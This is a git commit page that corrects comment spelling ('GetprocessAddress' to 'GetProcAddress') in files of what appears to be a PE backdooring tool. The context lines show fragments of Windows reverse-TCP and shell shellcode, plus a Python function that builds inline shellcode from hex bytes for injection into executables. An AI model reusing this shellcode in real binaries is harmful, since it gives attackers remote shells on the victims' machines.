updates

william76101 · Feb 7, 2017 · 78570a5 · 78570a5
1 parent deb304c
commit 78570a5
Show file tree

Hide file tree

Showing 3 changed files with 7 additions and 7 deletions.
diff --git a/asm/src/loadliba_reverse_tcp.asm b/asm/src/loadliba_reverse_tcp.asm
@@ -90,7 +90,7 @@ try_connect:
 ;  jnz short try_connect
 
 failure:
-; LoadLibA is in EBX and GetprocessAddress is in ESI
+; LoadLibA is in EBX and GetProcAddress is in ESI
 ; socket is in EDI MUST BE GOING OUT
 ; No need to exit.
 ;kernel32.dll!ExitProcess

diff --git a/asm/src/loadliba_shell.asm b/asm/src/loadliba_shell.asm
@@ -9,11 +9,11 @@
 ; Output: None.
 ; Clobbers: EAX, EBX, ECX, ESI, ESP will also be modified
 ; Calling getprocaddress and loadlibraryA smashes the following regs: EAX, ECX, EDX, ESP
-; Coming in LoadLibA is in EBX and GetprocessAddress is in ESI
+; Coming in LoadLibA is in EBX and GetprocAddress is in ESI
 ; socket is in EDI coming in
 
 ;Do a loadlibA of kernel32
-;then getprocessaddress of 'CreateProcessA'
+;then getprocaddress of 'CreateProcessA'
   push 0x0
   push 0x32336c65         ; Push kernel32 on the stack
   push 0x6e72656b         ; ...
@@ -26,7 +26,7 @@
   push 0x61657243         ; ...
   push esp                ; Push a pointer to CreateProcessA string on the stack
   push eax                ; Push handle for kernel32 on the stack
-  call dword [esi]        ; Call getprocessaddress | CreateProcessA address in EAX
+  call dword [esi]        ; Call getprocaddress | CreateProcessA address in EAX
 
   xchg ebp, eax           ; Put createprocessa in ebp
 
@@ -96,7 +96,7 @@ push_loop:               ;
   call dword [ebx]        ; handle for kernel32 now in eax
   
   ;loadLiba ebx, getprocaddr edi, PROCESS_INFORMATION Structure esi, kernel32 eax
-  ; getprocessaddress of 'WaitForSingleObject'
+  ; getprocaddress of 'WaitForSingleObject'
   push 0x00746365         ; Push WaitForSingleObject
   push 0x6a624f65         ; ...
   push 0x6c676e69         ; ...
@@ -105,7 +105,7 @@ push_loop:               ;
   push esp                ; Push pointer for WaitForSingleObject
   push eax                ; Push handle for kernel32
   xchg eax, ebp           ; mov kernel32 to ebp
-  call dword [edi]        ; GetprocessAddress (kernel32, WaitForSingleObject)
+  call dword [edi]        ; GetprocAddress (kernel32, WaitForSingleObject)
   xchg ebp, eax           ; Push waitforsingleobject address in ebp and kernel32 to eax
   
   ;loadLiba ebx, getprocaddr edi, PROCESS_INFORMATION Structure esi, kernel32 eax, waitforsingleobject ebp

diff --git a/intel/WinIntelPE32.py b/intel/WinIntelPE32.py
@@ -773,7 +773,7 @@ def iat_reverse_tcp_inline_threaded(self, flItms, CavesPicked={}):
                             "\x68\x52\x74\x6c\x45"  # RtlExitUserThread
                             "\x54"                  # push esp
                             "\x50"                  # push eax
-                            "\xff\x17"              # call getprocessaddress
+                            "\xff\x17"              # call getprocaddress
                             "\x6a\x00"              # push 0
                             "\xff\xd0"              # call eax
                             )